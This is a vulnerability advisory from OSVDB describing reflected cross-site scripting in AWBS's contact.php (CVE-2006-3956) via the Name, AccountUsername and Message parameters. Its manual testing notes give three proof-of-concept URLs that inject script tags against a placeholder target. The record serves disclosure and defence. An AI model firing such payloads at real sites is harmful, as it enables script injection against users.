AWBS contact.php Multiple Variable XSS

2006-07-29T08:34:09
ID OSVDB:27629
Type osvdb
Reporter newbinaryfile(newbinaryfile@gmail.com)
Modified 2006-07-29T08:34:09

Description

Vulnerability Description

AWBS contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'Name', 'AccountUsername' and 'Message' variables upon submission to the contact.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

AWBS contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'Name', 'AccountUsername' and 'Message' variables upon submission to the contact.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[target]/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1

http://[target]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername='><script>alert('XSS Vulnerability')%3B</script>&Message=1

http://[target]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=</textarea><script>alert('XSS Vulnerability')%3B</script>

References:

Vendor URL: http://www.awbs.com/ Secunia Advisory ID:21296 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0529.html Keyword: Advanced Webhost Billing System ISS X-Force ID: 28069 CVE-2006-3956